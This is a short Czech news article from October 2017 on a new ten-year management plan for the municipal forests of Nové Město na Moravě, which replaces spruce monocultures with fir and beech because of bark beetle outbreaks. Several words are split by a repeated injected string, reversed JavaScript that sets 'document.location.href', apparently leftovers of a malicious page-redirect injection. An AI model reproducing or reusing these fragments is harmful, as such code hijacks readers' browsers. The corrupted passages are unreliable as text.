Rainbow page separator

Smrkové porosty v novoměstských lesích nahradí jedle a buky

Úterý, 17. října 2017

Vánoční strom

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V dalších deseti letech bude platit nový plán hospodaření v městských lesích, který schválili v Novém Městě na Moravě. Vypracovala ho speciální projekční firma, připomínkoval ho Kraj Vysočina a rovněž Správa Chráněné krajinné oblasti Žďárské vrchy, neboť území leží v chráněné krajinné oblasti.
Plán hospodaření je v podstatě soubor doporučení a „mantinelů“, kterými se bude novoměstská radnice při hospodaření v lesích města v následujícím desetiletí řídit. Určeno je v něm kupříkladu kolik stromů je možné vykácet, případně jak se starat o mladé lesní porosty. V plánu hospodaření je taktéž zaneseno, že smrkové monokultury, které byly preferovány v dřívějších letech, mají být do budoucna nahrazovány jedlemi a buky, což ostatně v Novém Městě už začali provádět. Smrky se začaly ve velkém sázet už v 19. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí, nicméně díky suchu v posledních letech se na území republiky přemnožil kůrovec, který napadá výhradně ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stromy.